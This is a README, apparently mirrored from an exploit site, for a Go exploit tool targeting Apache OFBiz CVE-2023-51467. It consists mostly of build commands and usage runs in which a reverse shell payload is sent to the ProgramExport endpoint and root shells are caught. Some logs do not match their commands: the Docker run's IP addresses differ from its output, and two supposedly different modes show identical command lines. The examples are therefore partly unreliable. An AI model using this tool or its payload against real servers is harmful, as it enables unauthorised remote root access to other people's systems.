## https://sploitus.com/exploit?id=31A981C8-F369-501E-9E07-9A751CE911B4
# Go-Exploit for CVE-2023-51467
This repository contains a go-exploit for Apache OFBiz CVE-2023-51467. The implementation contains target verification, a version scanner, and an in-memory Nashorn reverse shell as the payload (requires the Java in use supports Nashorn). The weaponization process is described on the [VulnCheck blog](https://vulncheck.com/blog/ofbiz-cve-2023-51467).
# Compiling
You can use the makefile to build a docker container:
```sh
make docker
```
Or, if you have a Go build environment ready to go, just use `make`:
```sh
albinolobster@mournland:~/cve-2023-51467$ make
gofmt -d -w cve-2023-51467.go
golangci-lint run --fix cve-2023-51467.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-51467_linux-arm64 cve-2023-51467.go
albinolobster@mournland:~/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -h
An exploit for Apache OFBiz CVE-2023-51467 that can generate a reverse shell or bind shell
```
## Example Usage
### Using Docker
```
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ sudo docker run -it --network=host cve-2023-51467 -v -c -e -rhost 10.9.49.88 -rport 8090 -lhost 10.9.49.85 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"
```
### Encrypted Nashorn Reverse Shell
```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"
```
### Unencrypted Reverse Shell
```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270
time=2024-01-03T16:55:51.232-05:00 level=STATUS msg="Starting listener on 10.9.49.131:1270"
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:52.595-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Sending a reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:52.948-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:38038"
time=2024-01-03T16:55:52.948-05:00 level=STATUS msg="Active shell from 10.9.49.121:38038"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:58.861-05:00 level=STATUS msg="Exploit exited with an error"
```